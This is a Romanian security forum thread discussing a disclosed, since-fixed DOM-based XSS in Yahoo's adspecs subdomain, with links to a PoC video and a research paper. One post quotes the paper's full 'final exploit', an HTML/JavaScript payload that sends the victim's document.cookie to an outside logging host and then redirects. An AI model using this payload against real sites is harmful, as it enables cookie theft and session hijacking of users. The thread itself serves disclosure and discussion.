neox Posted January 29, 2013 Report Share Posted January 29, 2013 vulnerabilitate pocvideohttp://www.offensive-security.com/videos/yahoo-xss-0day.mp4DOMSDAY Analyzing a DOM-Based XSS in Yahoo!Abysssec Security Research Quote Link to comment Share on other sites More sharing options...
teko. Posted January 29, 2013 Report Share Posted January 29, 2013 Interesant, si codul din acel "evil.html" nu e facut public si sper sa nu ajunga public. Quote Link to comment Share on other sites More sharing options...
nein Posted January 29, 2013 Report Share Posted January 29, 2013 e xss in yahoo maill ? mai pe scurt.. Quote Link to comment Share on other sites More sharing options...
nAb.h4x Posted January 29, 2013 Report Share Posted January 29, 2013 e xss in yahoo maill ? mai pe scurt..Da ! E XSS Dom Based ! Quote Link to comment Share on other sites More sharing options...
alexx666xx Posted January 29, 2013 Report Share Posted January 29, 2013 o sa fie facut public cand o sa repare problema cei de la yahoo Quote Link to comment Share on other sites More sharing options...
ionut97 Posted January 29, 2013 Report Share Posted January 29, 2013 (edited) In paper scrie clar ca vulnerabilitatea era intr-un js folosit de toate subdomeniile adspecs.yahoo.com.Totul a fost raportat si rezolvat.http://www.exploit-db.com/wp-content/themes/exploit/docs/24109.pdf"Final exploit":<html> <script> window.name=' new Image().src="http://abysssec.com/log/log.php?cookie="+encodeURI(document.cookie); setTimeout(\"location.href = \'http:\/\/www.yahoo.com\';\",10);';location.href="http://adspecs.yahoo.com/index.php"; </script></html>+ ca XSS-ul putea fi gasit cu DOMinator. Edited January 29, 2013 by ionut97 Quote Link to comment Share on other sites More sharing options...
systemblack Posted January 29, 2013 Report Share Posted January 29, 2013 poc yahoo Quote Link to comment Share on other sites More sharing options...